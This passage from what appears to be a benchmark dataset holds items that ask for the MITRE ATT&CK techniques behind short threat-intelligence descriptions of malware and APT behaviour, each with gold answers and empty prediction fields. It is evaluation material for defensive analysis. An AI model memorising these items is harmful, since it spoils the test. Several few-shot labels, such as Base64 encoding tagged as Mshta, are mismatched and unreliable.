T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple\u2019s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple\u2019s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.\n\t - T1190: Exploit Public-Facing Application\n- Text: APT34 uses remote services such as VPN, Citrix, or OWA to persist in an environment.\n\t - T1133: External Remote Services\n", + "input": "APT41 executed \"file /bin/pwd\" in activity exploiting CVE-2019-19781 against Citrix devices.", + "gold": "- T1059.004: Command and Scripting Interpreter - Unix Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a tool that can detect the existence of remote systems.\n\t - T1018: Remote System Discovery\n- Text: If the user account doesn\u2019t have local administrative or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates the admin\u2019s usernames. To identify if privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser-command to show logged on users is also heavily used by them. If such a privileged user was recently active on a server the adversary executes Cobalt Strike\u2019s built-in Mimikatz to dump its password hashes\n\t - T1087.002: Account Discovery - Domain Account\n- Text: APT29 leveraged privileged accounts to replicate directory service data with domain controllers.\n\t - T1003.006: OS Credential Dumping - DCSync\n", + "input": "During Operation Wocao, threat actors used `nbtscan` and `ping` to discover remote systems, as well as `dsquery subnet` on a domain controller to retrieve all subnets in the Active Directory.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files\n\t - T1113: Screen Capture\n- Text: FLASHFLOOD stages data it copies from the local system or removable drives in the \"%WINDIR%\\$NtUninstallKB885884$\\\" directory.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: yty uses a keylogger plugin to gather keystrokes.\n\t - T1056.001: Input Capture - Keylogging\n", + "input": "ECCENTRICBANDWAGON can capture screenshots and store them locally.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mustang Panda has sent malicious files requiring direct victim interaction to execute.\n\t - T1204.002: User Execution - Malicious File\n- Text: SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: 1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "Higaisa used malicious e-mail attachments to lure victims into executing LNK files.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: decodes strings in the malware using XOR and RC4.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: SUNBURST used VBScripts to initiate the execution of payloads.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. Instead, it writes it\u2019s keylog to a registry key that it uses as a buffer\n\t - T1027: Obfuscated Files or Information\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "MuddyWater decoded base64-encoded PowerShell commands using a VBS file.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses Rundll32 to load a malicious DLL.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Patchwork ran a reverse shell with Meterpreter. Patchwork used JavaScript code and .SCT files on victim machines.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Gamaredon Group malware has used rundll32 to launch additional malicious components.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has exfiltrated files stolen from local systems.\n\t - T1005: Data from Local System\n- Text: obtained OS version and hardware configuration from a victim.\n\t - T1082: System Information Discovery\n- Text: has commands to get the current user's name and SID.\n\t - T1033: System Owner/User Discovery\n", + "input": "Flagpro can collect data from a compromised host, including Windows authentication information.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacSpy deletes any temporary files it creates\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: No matching sample found for T1546.016\n- Text: The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n\t - T1574: Hijack Execution Flow\n\t - T1569.002: System Services - Service Execution\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "HTTPBrowser deletes its original installer file once installation is complete.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: Cobalt Group has sent malicious Word OLE compound documents to victims.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: TA551 has used mshta.exe to execute malicious payloads.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", + "input": "POWERSTATS can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.", + "gold": "- T1559.001: Inter-Process Communication - Component Object Model", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EXOTIC LILY has created e-mail accounts to spoof targeted organizations.\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: HEXANE has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization.\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: APT3\u00a0(also known as UPS), the actors responsible for\u00a0Operation Clandestine Fox\u00a0has quietly continued to send waves of spearphishing messages over the past few months. This actor initiated their most recent campaign on November 19, 2014 targeting multiple organizations. The attacker leveraged multiple exploits, targeting both\u00a0CVE-2014-6332\u00a0and\u00a0CVE-2014-4113. CVE-2014-6332 was disclosed publicly on 2014-11-11 and is a Windows OLE Automation Array Remote Code Execution vulnerability. CVE-2014-4113 is a privilege escalation vulnerability that was\u00a0disclosed publicly on 2014-10-14.\n\t - T1587.004: Develop Capabilities - Exploits\n\t - T1566.003: Phishing - Spearphishing via Service\n\t - T1534: Internal Spearphishing\n", + "input": "For Operation Wocao, the threat actors registered email accounts to use during the campaign.", + "gold": "- T1585.002: Establish Accounts - Email Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PoisonIvy starts a rootkit from a malicious file dropped to disk.\n\t - T1014: Rootkit\n- Text: kaudited \u2014 A file installed as /usr/bin/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won\u2019t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions\n\t - T1547.006: Boot or Logon Autostart Execution - Kernel Modules and Extensions\n- Text: Lucifer can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.\n\t - T1496: Resource Hijacking\n", + "input": "Zeroaccess is a kernel-mode rootkit.", + "gold": "- T1014: Rootkit", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For Operation Spalax, the threat actors registered hundreds of domains using Duck DNS and DNS Exit.\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: Leviathan has created new email accounts for targeting efforts.\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: EXOTIC LILY has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "During Operation Honeybee, threat actors registered domains for C2.", + "gold": "- T1583.001: Acquire Infrastructure - Domains", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Monero miner scripts are downloaded from TeamTNT\u2019s server and piped to \u201cbash\u201d using a SSH session on the underlying host as the \u201croot\u201d user by supplying the private key from \u201c/tmp/TeamTNT.\u201d Later, the private key \u201c/tmp/TeamTNT\u201d is removed as well.\n\t - T1098.004: Account Manipulation - SSH Authorized Keys\n\t - T1195: Supply Chain Compromise\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1021.004: Remote Services - SSH\n\t - T1552.004: Unsecured Credentials - Private Keys\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: Remsec can dump the SAM database.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: REvil reached its pinnacle of success in the first half of 2021, compromising thousands of companies in a Kaseya MSP supply-chain attack, demanding a $50 million payment from computer maker Acer, and extorting Apple using stolen blueprints of non-yet-released devices.\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1189: Drive-by Compromise\n", + "input": "During Night Dragon, threat actors obtained and used tools such as gsecdump.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TAINTEDSCRIBE has used FakeTLS for session authentication.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n- Text: During Operation Wocao, threat actors' proxy implementation \"Agent\" upgraded the socket in use to a TLS socket.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: Winnti malware handles outbound communications using multiple protocols including: ICMP, HTTP, as well as custom TCP and UDP protocols. Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports\n\t - T1071.001: Application Layer Protocol - Web Protocols\n\t - T1095: Non-Application Layer Protocol\n", + "input": "FakeM C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers. Additionally, some variants of FakeM use modified SSL code for communications back to C2 servers, making SSL decryption ineffective.", + "gold": "- T1001.003: Data Obfuscation - Protocol Impersonation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The HTTP mode is the same communication method used in variants of the malware from 2018. Although it uses the non-encrypted HTTP protocol to communicate with the C2 it manually encrypts the contents of the requests to hide data from packet inspection. The malware creates an AES session key and initial value (as detailed in Appendix C) which are base64 encoded, appended to each other with a \\n separator. Once appended, it is further encrypted with a hardcoded RSA public key and base64 encoded again and obfuscated before being sent to the C2 as the body of a POST request\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.\n\t - T1027: Obfuscated Files or Information\n", + "input": "Mongall has the ability to RC4 encrypt C2 communications.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Night Dragon, threat actors used dynamic DNS services for C2.\n\t - T1568: Dynamic Resolution\n- Text: Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.\n\t - T1102.001: Web Service - Dead Drop Resolver\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments\n\t - T1568.003: Dynamic Resolution - DNS Calculation\n", + "input": "RTM has resolved Pony C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.", + "gold": "- T1568: Dynamic Resolution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gold Dragon encrypts data using Base64 before being sent to the command and control server.\n\t - T1560: Archive Collected Data\n- Text: Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: After the configuration is parsed, Cardinal RAT will proceed with making attempts at connecting with the C2. Using an example request and response from a C2 server, we can see how this traffic is configured\n\t - T1560.002: Archive Collected Data - Archive via Library\n", + "input": "Axiom has compressed and encrypted data prior to exfiltration.", + "gold": "- T1560: Archive Collected Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AppleJeus has waited a specified time before downloading a second stage payload.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.\n\t - T1029: Scheduled Transfer\n- Text: The first email displays the following decoy document to the infected user and download the following payload:hxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpgThe second email displays the following decoy document to the infected user and downloads the following payload:hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpgIn both cases, the downloaded payload is the ROKRAT malware.The first tasks of this variant of ROKRAT is to check the operating system version\n\t - T1105: Ingress Tool Transfer\n\t - T1497: Virtualization/Sandbox Evasion\n", + "input": "Tomiris has the ability to sleep for at least nine minutes to evade sandbox-based analysis systems.", + "gold": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: REvil has used encrypted strings and configuration files.\n\t - T1027: Obfuscated Files or Information\n- Text: InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Denis encodes the data sent to the server in Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "OSX_OCEANLOTUS.D encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Turla has obtained information on security software, including security logging information that may indicate whether their malware has been detected.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: After initial installation, Raindrop runs a computation to delay execution.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: NanHaiShu can change Internet Explorer settings to reduce warnings about malware activity.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", + "input": "StrongPity can identify if ESET or BitDefender antivirus are installed before dropping its payload.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SslMM creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.\n\t - T1056.001: Input Capture - Keylogging\n- Text: contains screen capture functionality.\n\t - T1113: Screen Capture\n- Text: EvilGrab has the capability to capture audio from a victim machine.\n\t - T1123: Audio Capture\n", + "input": "RCSession has the ability to capture keystrokes on a compromised host.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022\n\t - T1105: Ingress Tool Transfer\n- Text: Fox Kitten has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.\n\t - T1090: Proxy\n- Text: CallMe exfiltrates data to its C2 server over the same protocol as C2 communications.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "Winnti for Linux has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HELLOKITTY is written in C++, but reimplements a significant portion of DEATHRANSOM's functionality using similar loop operations and thread pooling via QueueUserWorkItem. The code structure to enumerate network resources, logical drives, and perform file encryption is very similar. Additionally, HELLOKITTY and DEATHRANSOM share very similar functions to check for the completion status of their encryption threads before exiting\n\t - T1082: System Information Discovery\n\t - T1135: Network Share Discovery\n- Text: RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.\n\t - T1485: Data Destruction\n- Text: menuPass has staged data on remote MSP systems or other victim networks prior to exfiltration.\n\t - T1074.002: Data Staged - Remote Data Staging\n", + "input": "Dragonfly 2.0 identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.", + "gold": "- T1135: Network Share Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Some strings in are obfuscated with XOR x56.\n\t - T1027: Obfuscated Files or Information\n- Text: macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection.\n\t - T1027.008: Obfuscated Files or Information - Stripped Payloads\n- Text: We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell: Append a string to the password that acts as a salt Obtain the SHA1 hash of the resulting string containing the password and salt Base64 encode the SHA1 hash Compare the encoded hash with hardcoded base64 string If the encoded hash matches hardcoded base64 string then the inbound request is authenticated Generates the SHA256 hash of the password string Base64 encodes the SHA256 hash and uses the first 24 characters as a key Uses 24-character key and the 3DES cipher to decrypt the embedded webshell Now let\u2019s look at how this works with the values in the TwoFace++ loader sample\n\t - T1573: Encrypted Channel\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027: Obfuscated Files or Information\n\t - T1550.002: Use Alternate Authentication Material - Pass the Hash\n\t - T1132: Data Encoding\n", + "input": "Epic heavily obfuscates its code to make analysis more difficult.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A Destover-like implant used by can obtain the current system time and send it to the C2 server.\n\t - T1124: System Time Discovery\n- Text: NOKKI can collect the username from the victim\u2019s machine.\n\t - T1033: System Owner/User Discovery\n- Text: P8RAT has the ability to 